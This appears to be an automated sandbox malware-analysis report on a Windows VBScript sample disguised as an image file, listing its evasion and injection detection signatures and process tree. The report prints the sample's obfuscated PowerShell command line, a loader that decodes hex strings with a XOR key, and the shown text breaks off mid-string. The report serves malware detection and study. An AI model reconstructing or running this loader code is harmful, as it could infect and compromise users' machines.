Edit tour
Windows
Analysis Report
IMG_2022028022-0120.vbs
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 1048 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\IMG_2 022028022- 0120.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6032 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Badeansta lt = """re FLiuEfnBrc ExtApiHjoS tnBu HyHFl TDuBSp su{ Hi Cl An P a BapinaCa rZiaSomVo( Cz[PaSDeta lrCaiennOu gDe]Ca`$Ud HBaSUd)Fr; Ag At Ud H o Af`$UsBe uyAktNoePa sBo Sa=Sn ThNAneNowB o-MuOGrbEp jLoeDdcBet Hu TobPayV rtSeeLa[Al ]Po Bd(Me` $VaHTnSDe. ReLPeeNonV egMatunhSl Re/Sk Di2 Gi)Ko;Un g e Ma Is Ge FFloLerWi( fe`$HaiOp= om0Pe;Fu M a`$PhiDo G e-MaltitSe Fa`$SyHBe SBa.DoLUne DenScgDotU nhCa;Do Un `$reiom+Re =Be2Du)Va{ Fl Pl Re A d Ot ta Sp Sk Ho`$Do BFeyDetLee gasSm[Fi`$ geiAf/na2D e]Od Ge=Sa Tr[RecSko UnnLivKres irOrtBr]Il :Me:DaTDio DiBBoyPatG leSu(Po`$U sHHeSPh.bo SFruAfbNes MatUnrPriP onUngLa(Il `$StiPa,Su Jo2Po)Ca, Bl Af1Sn6D u)No;Ma Te Un`$miBKr yPrtCheGts Pa[Du`$Syi Un/Tr2Fi]M i Ta=Ha Ah (Fo`$SiBbi yIntOpeovs Ol[Kb`$spi He/Ar2Fr]F e Ci-FrbRe xEnoPhrTi Hy2St2Re9L a)lo;so Le De Ca Vr} Re Un[MuSk utSqrLaiAp nNogBl]Pe[ MaSChyInsD etpaeNemSt .VaTBaeKax IbtBi.ReEM anPlcGeour dPriMonPrg Sy]Si:Ko:R aAUdSAkCWa IFoIsa.MoG BaeButTaSG utUnrFriUl nIngBa(Ba` $FobSeyPit TheAnsId)l i;Bl}Ga`$D eHBrdSalUn cIr0Sk=KrH OuTBeBAf R y'BeBRe6te 9SpCBe9Be6 Pr9Gr1js8E t0Am8In8Se CEnBCa8co1 In8Ta9Pr8C r9De'Sy;Lu `$plHRvdaf lFocIn1De= TrHDiTZiBV e Un'FeAKr 8Re8TaCDe8 Sl6Gr9Ag7i s8XyASv9Sp 6Sh8CaAHe8 De3Bl9An1u nCTiBteBAb 2Ha8SmCUr8 SuBCuDbu6L kDTi7MaCMe BSeBDe0As8 TrBCh9Ah6M e8To4Pr8Ne 3Fr8In0boA ReBRa8st4T i9Ve1un8Ap COp9dk3Bi8 Co0SuACl8A n8en0Un9In 1Mo8DeDAn8 PeAUd8Wu1R a9Ca6Ba'Fo ;El`$LoHBl dNolSucBo2 Ne=TnHBlTU nBSp Ne'si AFi2Sk8Ti0 Di9Ul1tyBL o5Ob9Fi7no 8ByACe8An6 PoALa4Da8B i1Ka8Im1Wh 9Gt7lo8Ge0 Rr9Br6Br9D i6Ar'Fl;gr `$CyHEidAr lblcPr3pr= OvHenTnoBC o Ta'LeBUn 6re9UpCGu9 Sn6Gn9Fa1B r8Mo0Da8Pr 8LyCOvBBeB wa7Sk9Fo0S a8MaBDe9Ev 1Af8KaCBa8 Oc8Sc8He0N oCObBFoATo CDe8SiBSi9 Se1Be8Or0S e9No7Fl8Hu AOu9ty5RaB Co6Kr8Sk0d d9Se7As9Ri 3Le8laCBr8 we6Ou8Di0o c9Be6DaCKa BTeAUnDPu8 Se4St8IsBE r8si1Ja8Ng 9Li8Sp0FoB Di7Ci8Ex0V i8st3sl'Sk ;De`$FlHPe dJalJdcTi4 Ki=KlHStTP rBFo Ge'Th 9fi6Af9Sy1 Af9Re7He8C rCWi8FoBSt 8Ov2Be'Bl; Al`$AnHInd aclFocBu5T a=OvHDeTWh BUn Ca'UdA De2Sy8Pi0I n9Af1CaARi 8Ha8PrAno8 Sl1Py9Du0G n8Ki9Ud8Po 0MuAUnDNe8 No4Ud8EpBA c8vi1Bj8Sp 9St8Op0An' Af;Se`$OrH BydGrlCicF o6hm=CeHSk TInBHa Di' FaBIn7ApBi n1waBbe6Em 9Re5sa8No0 Wo8Ai6mi8M iCBa8Pa4Sh 8El9NoAStB Fo8Un4Ko8O m8Lo8Ro0St Cfo9ChCco5 SyAJuDAg8A fCCo8In1Ps 8In0FrAMi7 Se9LaCTaBB r6er8TiCAp 8Hu2PoCEp9 SuCLo5miBR e5Ps9No0Wa 8Ko7St8Sa9 po8FuCCr8E g6No'in;Hu `$InHCadUd lRocSt7mi= ReHPrTroBZ e da'NeBPa 7Ri9Di0Un8 chBgn9Ea1K u8SkCMe8Pr 8Su8Di0OvC Ka9MoCSa5S wAUd8Un8Bl 4si8DiBLy8 Un4ur8Gl2F a8Fi0wh8Ne 1Sc'Wa;Dd` $DeHOpdSel NocAz8Tr=B yHDiTSiBPy ev'AvBUn7 Di8tr0Om8I n3Ma8Fr9pr 8ud0Pr8Fe6 Tr9Br1Sl8M i0Gr8In1bi AVe1Hy8Sv0 Ur8Hv9Pl8B l0Kl8Ph2Ni 8Se4Fa9Fy1